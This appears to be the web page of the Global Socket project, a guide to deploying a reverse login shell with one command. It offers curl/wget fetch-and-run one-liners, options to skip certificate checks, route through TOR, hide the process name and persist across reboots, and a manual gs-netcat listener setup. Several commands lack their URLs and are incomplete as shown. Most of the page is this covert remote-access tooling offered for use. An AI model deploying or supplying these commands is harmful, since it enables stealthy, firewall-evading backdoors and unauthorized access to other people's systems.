Global Socket

Connect like there is no firewall. Securely.

Project maintained by hackerschoice Hosted on GitHub Pages — Theme by mattgraham

Deploy a reverse login shell with a single command (fully automated) - and access the shell remotely - encrypted - and via TOR if you like.

This must be the quickest way to access a system – anonymous

Use either one of these two commands to install:

bash -c "$(curl -fsSL"
bash -c "$(wget --no-verbose -O-"

Use either one of these two commands to uninstall:

GS_UNDO=1 bash -c "$(curl -fsSL"
GS_UNDO=1 bash -c "$(wget --no-verbose -O-"

Use either command to access the remote host:

S="ExampleSecretChangeMe" bash -c "$(curl -fsSL"
S="ExampleSecretChangeMe" bash -c "$(wget --no-verbose -O-"

This is just one of many GSOCKET examples. More on GitHub.


Deploy on a host


Log in to the host from your workstation


Tips & Tricks

Ignore SSL / Certificate warnings:

bash -c "$(curl -fsSLk"
bash -c "$(wget --no-check-certificate -qO-"

Deploy with a predefined secret:

X=ExampleSecretChangeMe bash -c "$(curl -fsSL"

Deploy with curl and fallback to wget:

command -v curl >/dev/null && bash -c "$(curl -fsSL" || bash -c "$(wget --no-verbose -O-"

Deploy with a predefined secret. Try curl and fallback to wget:

X=ExampleSecretChangeMe && (command -v curl >/dev/null && X=$X bash -c "$(curl -fsSL" || X=$X bash -c "$(wget --no-verbose -O-")

Deploy from self-extracting shell-script without fetching any packages and using good old plain HTTP:

wget --no-hsts && \
bash ./

Useful environment variables:

S= Connect to a system (or use gs-netcat -s <secret> -il).
X= Set a predefined secret for the installation (X like in inXstallation).
GS_NOINST=1 Only start but without installing (will not survive a reboot).
GSOCKET_ARGS= Use additonal arguments. Most often used to force TOR in combination with S=, e.g. GSOCKET_ARGS="-T" S=<secret> bash -c "$(curl -fsSLk
GS_DSTDIR= Set the installation directory. The default is to pick the most suitable automatically. Use find . -type d -writable.
GS_URL_BASE= Use URL for static binaries. The default is
GS_OSARCH= Force architecture. The default is to pick the most suitable automatically.
GS_DEBUG=1 Verbose output and other debug related settings. Often used together with GS_DEBUG=1 GS_NOSTART=1 GS_NOINST=1 bash -c "$(curl -fsSL".
GS_HIDDEN_NAME= Use a custom hidden process name.
TMPDIR= Use a custom temporary directory. Try TMPDIR=$(pwd)

If all fails:

Download the static binary from (likely gs-netcat_x86_64-alpine.tar.gz) and extract and start gs-netcat manually:

curl -fsSL | tar xz -C /bin gs-netcat
SECRET=$(/bin/gs-netcat -g)
GSOCKET_ARGS="-liD -s $SECRET" /bin/gs-netcat
echo "Connect with: gs-netcat -s $SECRET -i" 

Get Involved. We are looking for volunteers to work on the website and a logo and to discuss new ideas. Join us on telegram.